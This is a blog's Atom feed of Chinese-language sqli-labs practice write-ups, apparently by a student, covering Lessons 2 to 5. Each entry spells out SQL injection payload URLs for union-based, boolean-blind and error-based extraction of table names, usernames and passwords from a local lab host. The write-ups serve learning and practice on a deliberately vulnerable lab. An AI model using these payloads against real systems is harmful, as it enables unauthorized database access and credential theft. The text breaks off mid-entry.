<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Fre3L3i&#39;s blogs</title>
  
  <subtitle>Fre3L3i&#39;s Blog</subtitle>
  <link href="/atom.xml" rel="self"/>
  
  <link href="http://fre3l3i.github.io/"/>
  <updated>2019-12-05T11:11:12.953Z</updated>
  <id>http://fre3l3i.github.io/</id>
  
  <author>
    <name>Fre3L3i</name>
    
  </author>
  
  <generator uri="http://hexo.io/">Hexo</generator>
  
  <entry>
    <title>sql-lib每日一记_Less5(day5)</title>
    <link href="http://fre3l3i.github.io/2019/12/05/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0-Less5-day5/"/>
    <id>http://fre3l3i.github.io/2019/12/05/sql-lib每日一记-Less5-day5/</id>
    <published>2019-12-05T10:34:14.000Z</published>
    <updated>2019-12-05T11:11:12.953Z</updated>
    
    <content type="html"><![CDATA[<h2 id="SQL-Lib-Less5"><a href="#SQL-Lib-Less5" class="headerlink" title="SQL-Lib_Less5"></a><strong>SQL-Lib_Less5</strong></h2><h3 id="查看源代码"><a href="#查看源代码" class="headerlink" title="查看源代码"></a><strong>查看源代码</strong></h3><p><img alt data-src="img1.png" class="lozad"> </p><p>​    首先分析可以看到这里以单引号闭合，如果有查询出来的值返回you are in ….，否则如果语句错误，或sql连接有误，会把错误输出出来，并且输出一个<br></p><hr><h3 id="用意"><a href="#用意" class="headerlink" title="用意"></a>用意</h3><p>**    这道题想告诉我们的是当查询正确的时候他会返回you are in …. 而当错误或异常的时候他只会返回空或是错误语句<strong>**，那如果不理解可以理解为you</strong> <strong>are in….(代表了True)**</strong>，而返回为空则代表了（False）**</p><hr><h3 id="尝试正常访问-和非正常访问"><a href="#尝试正常访问-和非正常访问" class="headerlink" title="尝试正常访问**和非正常访问**"></a><strong>尝试正常访问**</strong>和非正常访问**</h3><p>​    <a href="http://192.168.72.179/sqli-labs/Less-5/?id=1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1</a> </p><p><img alt data-src="img2.png" class="lozad"></p><p>​    <a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;</a></p><p><img alt data-src="img3.png" class="lozad"></p><p><strong>可以明显看到有错误返回**</strong>，可以判断语句是可以被执行的，并且没有加过滤**</p><hr><h3 id="首先我们先查询一下版本-，测试一下我们是否能用盲注的方式获得数据"><a href="#首先我们先查询一下版本-，测试一下我们是否能用盲注的方式获得数据" class="headerlink" title="首先我们先查询一下版本**，测试一下我们是否能用盲注的方式获得数据**"></a><strong>首先我们先查询一下版本**</strong>，测试一下我们是否能用盲注的方式获得数据**</h3><ul><li><p>​    利用left(database(),1)进行尝试</p></li><li><p>​    下面是LEFT()函数的语法</p></li><li><p>​    LEFT(str,length);</p></li><li><p>​    LEFT()函数接受两个参数：</p></li><li><p>str是要提取子字符串的字符串。</p></li><li><p>length是一个正整数，指定将从左边返回的字符数。</p></li></ul><p>LEFT()报道查看函数str字符串中最左边的长度字符。如果str或length参数为NULL，报道查看则NULL值。</p><p>如果length为0或为负，则LEFT函数报道查看一个空字符串。如果length大于str字符串的长度，则LEFT函数报道查看整个str字符串。</p><p>请注意，<a href="https://links.jianshu.com/go?to=http%3A%2F%2Fwww.yiibai.com%2Fmysql%2Fsubstring.html" target="_blank" rel="noopener">SUBSTRING</a>（或<a href="https://links.jianshu.com/go?to=http%3A%2F%2Fwww.yiibai.com%2Fmysql%2Fsubstring.html" target="_blank" rel="noopener">SUBSTR</a>）函数也提供与LEFT函数相同的功能。</p><p>SELECT LEFT(‘MySQL LEFT’, 5);</p><hr><h3 id="在这里在注释后面的语句的时候突然发现了一个问题"><a href="#在这里在注释后面的语句的时候突然发现了一个问题" class="headerlink" title="在这里在注释后面的语句的时候突然发现了一个问题"></a><strong>在这里在注释后面的语句的时候突然发现了一个问题</strong></h3><p>​    正常来说#应该是可以注释掉的但是在环境中输入#并没有把后面的语句注释掉，报错任然显示，直到我把#用urlencode编码了之后换成%23才能成功执行语句</p><p>​    <a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> left(version(),1)=5#</p><p><img alt data-src="img4.png" class="lozad"> </p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> left(version(),1)=5%23</p><p><img alt data-src="img5.png" class="lozad"></p><p><strong>当然在这里也可以用**</strong>–+进行注释<strong><strong>，让</strong></strong>mysql语句后面不执行**</p><p><strong>那么回过主题，我们这里的数据库版本是**</strong>5.1.41的**</p><p><img alt data-src="img6.png" class="lozad"></p><p><strong>那么我们来看会下如果值不等于5会返回什么呢</strong></p><p><img alt data-src="img7.png" class="lozad"></p><p><strong>可以看到数据库查询是正确的**</strong>，但是猜的值不对，所以我们的返回为空**</p><p><strong>于是我们可以一点点猜测过去</strong></p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> left(version(),1)=5–+</p><p>可是知道猜到第四个值，sql语句报错了</p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> left(version(),4)=5.1.%23</p><p><img alt data-src="img8.png" class="lozad"></p><p>在mysql命令行中是这样报错的</p><p><img alt data-src="img9.png" class="lozad"></p><p><strong>大家可以在我的博客底下评论一起探讨这个问题哦</strong></p><hr><h3 id="爆破数据库第一位"><a href="#爆破数据库第一位" class="headerlink" title="爆破数据库第一位"></a>爆破数据库第一位</h3><p>​    <a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> left(database(),1)&gt;’a’–+</p><p><img alt data-src="img10.png" class="lozad"></p><p>Database()为security，所以我们看他的第一位是否&gt; a,很明显的是s &gt; a,因此返回正确。当我们不知情的情况下，可以用二分法来提高注入的效率。</p><p>猜测数据库第二位</p><p>得知第一位为s，我们看前两位是否大于sa</p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> left(database(),2)&gt;’sa’–+</p><p><img alt data-src="img11.png" class="lozad"></p><p>然后剩下的6个字符以此类推</p><hr><h3 id="substr-函数-ascii-函数-limit-函数讲解"><a href="#substr-函数-ascii-函数-limit-函数讲解" class="headerlink" title="substr()函数  ascii()函数 limit()函数讲解**"></a><strong>substr()函数</strong>  ascii()<strong>函数</strong> limit()函数讲解**</h3><p>​    </p><p>​    <strong>substr()**</strong>函数**</p><p>​    语法：<strong>substr(str,pos,len);</strong>//str:字符串，pos：起始位置，len：截断长度</p><p>​    例子：SELECT SUBSTR(‘2018-08-17’,6,7); </p><p><img alt data-src="img12.png" class="lozad"></p><p><strong>ASCII()函数</strong></p><p>​    返回字符串str的最左面字符的ASCII代码值。如果str是空字符串，返回0。如果str是NULL，返回NULL</p><p>举例：select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));</p><p><img alt data-src="img13.png" class="lozad"></p><p><strong>limit()函数</strong></p><p>limit子句用于限制查询结果返回的数量，常用于分页查询</p><p>举例：select table_name from information_schema.tables where table_schema=”security” limit 0,1;</p><p><img alt data-src="img14.png" class="lozad"></p><p> select table_name from information_schema.tables where table_schema=”security” limit 1,1;</p><p><img alt data-src="img15.png" class="lozad"></p><hr><p><strong>利用**</strong>substr() ascii()<strong>**函数进行尝试</strong></p><p> <a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;80– </p><p> <a href="http://192.168.72.179/sqli-labs/Less-5/?id=1%27and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c1%2c1))%3e80--+](http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c1%2c1))&gt;80--+" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1%27and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c1%2c1))%3e80--+](http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c1%2c1))&gt;80--+</a>)</p><p><img alt data-src="img16.png" class="lozad"></p><p>此处table_schema 可以写成=’security’，但是我们这里使用的database()，是因</p><p>为此处database()就是security。此处同样的使用二分法进行测试，直到测试正确为止。</p><p>此处应该是101，因为第一个表示email。</p><p>这里我们已经了解了substr()函数，这里使用substr(**,2,1)即可。</p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;and</a> ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))&gt;80– </p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1'and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c2%2c1))>80--+" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1%27and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c2%2c1))%3e80–+</a></p><hr><h3 id="regexp（）-函数"><a href="#regexp（）-函数" class="headerlink" title="regexp（） 函数"></a><strong>regexp（） 函数</strong></h3><p>MySQL 中使用 REGEXP 关键字指定正则表达式的字符匹配模式，下表列出了 REGEXP 操作符中常用的匹配列表。</p><p><img alt data-src="img17.png" class="lozad"></p><p> 举例：select * from users where username REGEXP ‘^a’;</p><p><img alt data-src="img18.png" class="lozad"></p><p><strong>利用**</strong>regexp** <strong>获取**</strong>security<strong><strong>中</strong></strong>users** <strong>表中的列</strong></p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;</a> and 1=(select 1 from information_sch</p><p>ema.columns where table_name=’users’ and table_name regexp ‘^us[a-z]’ limit 0,1)– </p><p>[<a href="http://192.168.72.179/sqli-labs/Less-5/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20table_name%20regexp%20%27^us[a-z\]%27%20limit%200,1)--+]" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20table_name%20regexp%20%27^us[a-z\]%27%20limit%200,1)--+]</a>(<a href="http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1&#39;</a> and 1=(select 1 from information_schema.columns where table_name=’users’ and table_name regexp ‘^us[a-z]’ limit 0,1)–+)</p><p>上述语句时选择users 表中的列名是否有us**的列</p><p><a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> and 1=(select 1 from information_schema.columns where</p><p>table_name=’users’ and column_name regexp ‘^username’ limit 0,1)–+</p><p><a href="http://192.168.72.179/sqli-labs/Less-5/?id=1'+and+1%3d(select+1+from+information_schema.columns+where+table_name%3d'users'+and+column_name+regexp+'^username'+limit+0%2c1)--+" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-5/?id=1%27+and+1%3d(select+1+from+information_schema.columns+where+table_name%3d%27users%27+and+column_name+regexp+%27%5eusername%27+limit+0%2c1)–+</a></p><p><img alt data-src="img19.png" class="lozad"></p><p>上图中可以看到username 存在。我们可以将username 换成password 等其他的项也是正确</p><p>的。</p><hr><p><strong>ORD()</strong>函数** MID()<strong>函数 IFNULL()函数</strong> CAST()函数 讲解**</p><p><strong>ORD()</strong> <strong>函数</strong></p><p><strong>ORD()</strong> <strong>函数返回字符串第一个字符的</strong> <a href="http://www.nowamagic.net/academy/tag/ASCII" target="_blank" rel="noopener"><strong>ASCII</strong></a> <strong>值。</strong></p><p><strong>语法： ORD(string)</strong></p><p>例子： select ord(‘I’);</p><p><img alt data-src="img20.png" class="lozad"></p><p>MID()函数</p><p>SQL MID() 函数用于得到一个字符串的一部分。这个函数被MySQL支持，但不被MS SQL Server和Oracle支持。在SQL Server， Oracle 数据库中，我们可以使用 SQL SUBSTRING函数或者 SQL SUBSTR函数作为替代。</p><p>MID() 函数语法为：<strong>SELECT</strong> MID(ColumnName,  Start [, Length])  <strong>FROM</strong> TableName</p><p>举例: select mid(‘fre3l3i’,1,5);</p><p><img alt data-src="img21.png" class="lozad"></p><p><strong>IFNULL()</strong> <strong>函数</strong></p><p>IFNULL() 函数用于判断第一个表达式是否为 NULL，如果为 NULL 则返回第二个参数的值，如果不为 NULL 则返回第一个参数的值。</p><p><strong>IFNULL()</strong> <strong>函数**</strong>语法为<strong>**：</strong>IFNULL(expression, alt_value)</p><p><strong>举例：</strong>SELECT IFNULL(NULL, “RUNOOB”);</p><p><img alt data-src="img22.png" class="lozad"></p><p><strong>CAST</strong>()函数****</p><p><strong>CAST用来转换字符类型</strong></p><p>语法：CAST( value AS type )</p><p>type的类型有</p><table><thead><tr><th><strong>value</strong></th><th><strong>描述</strong></th></tr></thead><tbody><tr><td>DATE</td><td>日期，格式为  ‘YYYY-MM-DD’.</td></tr><tr><td>DATETIME</td><td>日期加具体的时间，格式为  ‘YYYY-MM-DD HH:MM:SS’.</td></tr><tr><td>TIME</td><td>时间，格式为  ‘HH:MM:SS’.</td></tr><tr><td>CHAR</td><td>字符型</td></tr><tr><td>SIGNED</td><td>int</td></tr><tr><td>UNSIGNED</td><td>无符号int</td></tr><tr><td>BINARY</td><td>二进制型</td></tr><tr><td>DECIMAL</td><td>float型</td></tr></tbody></table><p><strong>举例**</strong>:**select cast(20.3456 as decimal(10, 2)) as num ;</p><p><img alt data-src="img23.png" class="lozad"></p><p>select cast(‘2019-03-08 15:31:26’ as datetime ) as date;</p><p><img alt data-src="img24.png" class="lozad"></p><hr><h3 id="利用ord（）和mid（）数获取users-表的内容"><a href="#利用ord（）和mid（）数获取users-表的内容" class="headerlink" title="利用ord（）和mid（）数获取users 表的内容**"></a><strong>利用ord（）和mid（）数获取users 表的内容**</strong></h3><p><img alt data-src="img25.png" class="lozad"></p><p><img alt data-src="img26.png" class="lozad"></p><p>获取users 表中的内容。获取username 中的第一行的第一个字符的ascii，与68 进行比较，</p><p>即为D。而我们从表中得知第一行的数据为Dumb。所以接下来只需要重复造轮子即可。</p><hr><h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a><strong>报错注入</strong></h3><p>Concat()函数</p><p>语法：concat(str1, str2,…)</p><p>作用：将多个字符串连接成一个字符串。</p><p>举例：select concat(id,username,password) as info from users;</p><p><img alt data-src="img27.png" class="lozad"></p><p><strong>Floor()函数</strong></p><p><strong>语法**</strong>：floor<strong>**(x)</strong></p><p><strong>作用**</strong>：返回小于或等于x的最大整数**</p><p><strong>举例：**</strong>select floor(1.5)**</p><p><img alt data-src="img28.png" class="lozad"></p><p> <a href="http://127.0.0.1/sqllib/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-5/?id=1&#39;</a> union Select 1,count(*),concat(0x3a,0x3a,(select user()),0</p><p>x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a–+</p><p><img alt data-src="img29.png" class="lozad"></p><p>利用double 数值类型超出范围进行报错注入，没有试验成功，主要由于函数溢出了之后返回为Null</p><p><img alt data-src="img30.png" class="lozad"></p><h2 id="每天一更-有点吃不消，这篇文章还没有结束，真的才发现，原来到了大学，时间真的没有那么的充分，希望大家能够好好珍惜时间。明天继续写，未完待续……"><a href="#每天一更-有点吃不消，这篇文章还没有结束，真的才发现，原来到了大学，时间真的没有那么的充分，希望大家能够好好珍惜时间。明天继续写，未完待续……" class="headerlink" title="每天一更 有点吃不消，这篇文章还没有结束，真的才发现，原来到了大学，时间真的没有那么的充分，希望大家能够好好珍惜时间。明天继续写，未完待续……"></a><strong>每天一更 有点吃不消，这篇文章还没有结束，真的才发现，原来到了大学，时间真的没有那么的充分，希望大家能够好好珍惜时间。明天继续写，未完待续……</strong></h2>]]></content>
    
    <summary type="html">
    
      
      
        &lt;h2 id=&quot;SQL-Lib-Less5&quot;&gt;&lt;a href=&quot;#SQL-Lib-Less5&quot; class=&quot;headerlink&quot; title=&quot;SQL-Lib_Less5&quot;&gt;&lt;/a&gt;&lt;strong&gt;SQL-Lib_Less5&lt;/strong&gt;&lt;/h2&gt;&lt;h3 id=&quot;查看源代
      
    
    </summary>
    
    
      <category term="sql-lib" scheme="http://fre3l3i.github.io/categories/sql-lib/"/>
    
    
      <category term="sql-lib每日一记" scheme="http://fre3l3i.github.io/tags/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0/"/>
    
  </entry>
  
  <entry>
    <title>sql-lib每日一记_Less4(day4)</title>
    <link href="http://fre3l3i.github.io/2019/12/03/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0-Less4-day4/"/>
    <id>http://fre3l3i.github.io/2019/12/03/sql-lib每日一记-Less4-day4/</id>
    <published>2019-12-03T03:44:07.000Z</published>
    <updated>2019-12-05T11:11:13.903Z</updated>
    
    <content type="html"><![CDATA[<h2 id="SQL-Lib-Less4"><a href="#SQL-Lib-Less4" class="headerlink" title="SQL-Lib_Less4"></a>SQL-Lib_Less4</h2><h3 id="查看代码-双引号括号闭合"><a href="#查看代码-双引号括号闭合" class="headerlink" title="查看代码 双引号括号闭合"></a>查看代码 双引号括号闭合</h3><p><img alt data-src="img1.png" class="lozad"></p><p>​    可以看到在传入id值的时候用了 . 拼接了 “</p><p>​    首先让他报错，查看报错的语句用什么闭合的</p><p><img alt data-src="img2.png" class="lozad"></p><h3 id="测试如何闭合可以不报错"><a href="#测试如何闭合可以不报错" class="headerlink" title="测试如何闭合可以不报错"></a>测试如何闭合可以不报错</h3><p><img alt data-src="img3.png" class="lozad"></p><hr><h3 id="找到闭合方法后，开始测字段，检测出当前表中有三个字段"><a href="#找到闭合方法后，开始测字段，检测出当前表中有三个字段" class="headerlink" title="找到闭合方法后，开始测字段，检测出当前表中有三个字段"></a><strong>找到闭合方法后，开始测字段，检测出当前表中有三个字段</strong></h3><p><img alt data-src="img4.png" class="lozad"></p><hr><h3 id="使用联合查询找到三个字段所输出的位置"><a href="#使用联合查询找到三个字段所输出的位置" class="headerlink" title="使用联合查询找到三个字段所输出的位置"></a><strong>使用联合查询找到三个字段所输出的位置</strong></h3><p><img alt data-src="img5.png" class="lozad"></p><hr><h3 id="首先爆破数据库"><a href="#首先爆破数据库" class="headerlink" title="首先爆破数据库"></a><strong>首先爆破数据库</strong></h3><p>​    <a href="http://192.168.72.179/sqli-labs/Less-4/?id=-1" " target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-4/?id=-1%22)%20union%20select%201,2,database()–+</a> union select 1,2,database()–+)</p><p><img alt data-src="img6.png" class="lozad"> </p><hr><h3 id="爆破security数据库的表"><a href="#爆破security数据库的表" class="headerlink" title="爆破security数据库的表"></a><strong>爆破security数据库的表</strong></h3><p>​    <a href="http://192.168.72.179/sqli-labs/Less-4/?id=-1&quot;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-4/?id=-1&quot;</a>) union select 1,2,group_concat(table_name ) from information_schema.tables where table_schema=”security”–+</p><p><img alt data-src="img7.png" class="lozad"></p><hr><h3 id="爆破users表中的字段"><a href="#爆破users表中的字段" class="headerlink" title="爆破users表中的字段"></a><strong>爆破users表中的字段</strong></h3><p>​    <a href="http://192.168.72.179/sqli-labs/Less-4/?id=-1&quot;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-4/?id=-1&quot;</a>) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users”–+</p><p><img alt data-src="img8.png" class="lozad"></p><hr><h3 id="直接提取数据"><a href="#直接提取数据" class="headerlink" title="直接提取数据"></a><strong>直接提取数据</strong></h3><p>​    <a href="http://192.168.72.179/sqli-labs/Less-4/?id=-1&quot;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-4/?id=-1&quot;</a>) union select 1,username,password from users where id=2–+ </p><p><img alt data-src="img9.png" class="lozad"></p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;h2 id=&quot;SQL-Lib-Less4&quot;&gt;&lt;a href=&quot;#SQL-Lib-Less4&quot; class=&quot;headerlink&quot; title=&quot;SQL-Lib_Less4&quot;&gt;&lt;/a&gt;SQL-Lib_Less4&lt;/h2&gt;&lt;h3 id=&quot;查看代码-双引号括号闭合&quot;&gt;&lt;a href
      
    
    </summary>
    
    
      <category term="sql-lib" scheme="http://fre3l3i.github.io/categories/sql-lib/"/>
    
    
      <category term="sql-lib每日一记" scheme="http://fre3l3i.github.io/tags/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0/"/>
    
  </entry>
  
  <entry>
    <title>sql-lib每日一记_Less3(day3)</title>
    <link href="http://fre3l3i.github.io/2019/11/29/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0-Less3-day3/"/>
    <id>http://fre3l3i.github.io/2019/11/29/sql-lib每日一记-Less3-day3/</id>
    <published>2019-11-29T06:47:51.000Z</published>
    <updated>2019-12-05T11:11:02.169Z</updated>
    
    <content type="html"><![CDATA[<h2 id="SQL-Lib-Less3"><a href="#SQL-Lib-Less3" class="headerlink" title="SQL-Lib_Less3"></a>SQL-Lib_Less3</h2><h3 id="查看代码"><a href="#查看代码" class="headerlink" title="查看代码"></a>查看代码</h3><p>​     <img alt data-src="img1.png" class="lozad"></p><ul><li><p><strong>可以看到使用的是括号闭合</strong></p><p><img alt data-src="img2.png" class="lozad"></p></li><li><p><strong>用 ) 闭合：?id=1′) –-+</strong></p></li></ul><hr><h3 id="爆破字段长度"><a href="#爆破字段长度" class="headerlink" title="爆破字段长度"></a>爆破字段长度</h3><ul><li><p><a href="http://192.168.72.179/sqli-labs/Less-3/?id=1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-3/?id=1&#39;</a>) order by 3–+</p></li><li><p><a href="http://192.168.72.179/sqli-labs/Less-3/?id=1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-3/?id=1&#39;</a>) order by 4–+</p><p><img alt data-src="img4.png" class="lozad"></p></li></ul><hr><h3 id="联合查询找到字段输出的位置"><a href="#联合查询找到字段输出的位置" class="headerlink" title="联合查询找到字段输出的位置"></a>联合查询找到字段输出的位置</h3><ul><li><a href="http://192.168.72.179/sqli-labs/Less-3/?id=-1'" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,3%20–+</a> union select 1,2,3 –+)</li></ul><p><img alt data-src="img5.png" class="lozad"> </p><hr><h3 id="爆破数据库，找到security数据库"><a href="#爆破数据库，找到security数据库" class="headerlink" title="爆破数据库，找到security数据库"></a>爆破数据库，找到security数据库</h3><ul><li><a href="http://192.168.72.179/sqli-labs/Less-3/?id=-1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-3/?id=-1&#39;</a>) union select 1,2,group_concat(schema_name) from information_schema.schemata –+</li></ul><p><img alt data-src="img6.png" class="lozad"></p><hr><h3 id="查询数据库中的表"><a href="#查询数据库中的表" class="headerlink" title="查询数据库中的表"></a>查询数据库中的表</h3><ul><li><a href="http://192.168.72.179/sqli-labs/Less-3/?id=-1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-3/?id=-1&#39;</a>) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security” –+</li></ul><p><img alt data-src="img7.png" class="lozad"></p><hr><h3 id="查询security数据库中的users表中的字段"><a href="#查询security数据库中的users表中的字段" class="headerlink" title="查询security数据库中的users表中的字段"></a>查询security数据库中的users表中的字段</h3><ul><li><a href="http://192.168.72.179/sqli-labs/Less-3/?id=-1&#39;" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-3/?id=-1&#39;</a>) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name =”users” –+</li></ul><p><img alt data-src="img8.png" class="lozad"></p><hr><h3 id="查询数据"><a href="#查询数据" class="headerlink" title="查询数据"></a>查询数据</h3><p><img alt data-src="img9.png" class="lozad"></p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;h2 id=&quot;SQL-Lib-Less3&quot;&gt;&lt;a href=&quot;#SQL-Lib-Less3&quot; class=&quot;headerlink&quot; title=&quot;SQL-Lib_Less3&quot;&gt;&lt;/a&gt;SQL-Lib_Less3&lt;/h2&gt;&lt;h3 id=&quot;查看代码&quot;&gt;&lt;a href=&quot;#查看代码&quot;
      
    
    </summary>
    
    
      <category term="sql-lib" scheme="http://fre3l3i.github.io/categories/sql-lib/"/>
    
    
      <category term="sql-lib每日一记" scheme="http://fre3l3i.github.io/tags/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0/"/>
    
  </entry>
  
  <entry>
    <title>sql-lib每日一记_Less2(day2)</title>
    <link href="http://fre3l3i.github.io/2019/11/28/sql-lib%E6%AF%8F%E6%97%A5%E4%B8%80%E8%AE%B0-Less2-day2/"/>
    <id>http://fre3l3i.github.io/2019/11/28/sql-lib每日一记-Less2-day2/</id>
    <published>2019-11-28T13:41:45.000Z</published>
    <updated>2019-11-29T06:51:45.971Z</updated>
    
    <content type="html"><![CDATA[<h2 id="SQL-Lib-Less2"><a href="#SQL-Lib-Less2" class="headerlink" title="SQL-Lib_Less2"></a>SQL-Lib_Less2</h2><ul><li><h3 id="查看源代码"><a href="#查看源代码" class="headerlink" title="查看源代码"></a>查看源代码</h3><p><img alt data-src="img1.png" class="lozad"></p><p>本地环境试验访问地址：<a href="http://192.168.72.179/sqli-labs/Less-1/?id=1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-1/?id=1</a> </p><p><img alt data-src="img2.png" class="lozad"></p></li></ul><ul><li><h3 id="查询语句"><a href="#查询语句" class="headerlink" title="查询语句"></a>查询语句</h3><p>$sql=”SELECT * FROM users WHERE id=$id LIMIT 0,1”;</p></li><li><p>可以看到这里并没有对id进行过滤，并且查询的是整数并以双引号闭合</p></li><li><p><strong>所以可以得知，整数注入可以直接和上面一篇一样注入，但无需闭合</strong></p><hr></li><li><h3 id="爆破字段"><a href="#爆破字段" class="headerlink" title="爆破字段"></a>爆破字段</h3><ul><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=1</a> order by 1</p></li><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=1</a> order by 2</p></li><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=1</a> order by 3</p></li><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=1</a> order by 4（到这里报错说明4是最大字段数）</p><p><img alt data-src="img3.png" class="lozad"></p></li></ul></li></ul><hr><ul><li><h3 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h3><ul><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=-1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=-1</a> union select 1,2,3</p><p><img alt data-src="img4.png" class="lozad"></p></li><li><p>发现了上面的三个字段的输出位置</p></li></ul></li></ul><hr><ul><li><h3 id="爆破数据库"><a href="#爆破数据库" class="headerlink" title="爆破数据库"></a>爆破数据库</h3><ul><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=-1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=-1</a> union select 1,2,database()</p><p><img alt data-src="img5.png" class="lozad"></p></li><li><p>得到了当前数据库为security</p></li></ul></li></ul><hr><ul><li><h3 id="爆破security数据库表"><a href="#爆破security数据库表" class="headerlink" title="爆破security数据库表"></a>爆破security数据库表</h3><ul><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=-1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=-1</a> union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security”</p><p><img alt data-src="img6.png" class="lozad"></p></li><li><p>得到了emails,referers,uagents,users四张表</p></li></ul></li></ul><hr><ul><li><h3 id="爆破users表中的字段"><a href="#爆破users表中的字段" class="headerlink" title="爆破users表中的字段"></a>爆破users表中的字段</h3><ul><li><p><a href="http://192.168.72.179/sqli-labs/Less-2/?id=-1" target="_blank" rel="noopener">http://192.168.72.179/sqli-labs/Less-2/?id=-1</a> union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users”</p><p><img alt data-src="img7.png" class="lozad"></p></li><li><p>得到了id,username,password 